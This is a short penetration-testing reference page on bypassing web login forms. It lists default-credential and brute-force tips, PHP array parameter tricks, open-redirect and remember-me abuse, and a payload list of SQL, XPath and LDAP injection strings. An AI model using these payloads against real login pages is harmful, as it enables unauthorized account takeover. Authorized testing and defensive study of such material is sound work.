Comment on page
Login Bypass
If you find a login page, here you can find some techniques to try to bypass it:
- Check for comments inside the page (scroll down and to the right?)
- Check if you can directly access the restricted pages
- Check to not send the parameters (do not send any or only 1)
- Check the PHP comparisons error: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
- Check credentials:
- Common combinations (root, admin, password, name of the tech, default user with one of these passwords).
- Create a dictionary using Cewl, add the default username and password (if there is) and try to brute-force it using all the words as usernames and password
In the following page you can find a custom list to try to bypass login via SQL Injections:
As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
If the page has "Remember Me" functionality check how is it implemented and see if you can abuse it to takeover other accounts.
Pages usually redirects users after login, check if you can alter that redirect to cause an Open Redirect. Maybe you can steal some information (codes, cookies...) if you redirect the user to your web.
- Check if you can enumerate usernames abusing the login functionality.
- Check if auto-complete is active in the password/sensitive information forms input:
<input autocomplete="false"
Last modified 2yr ago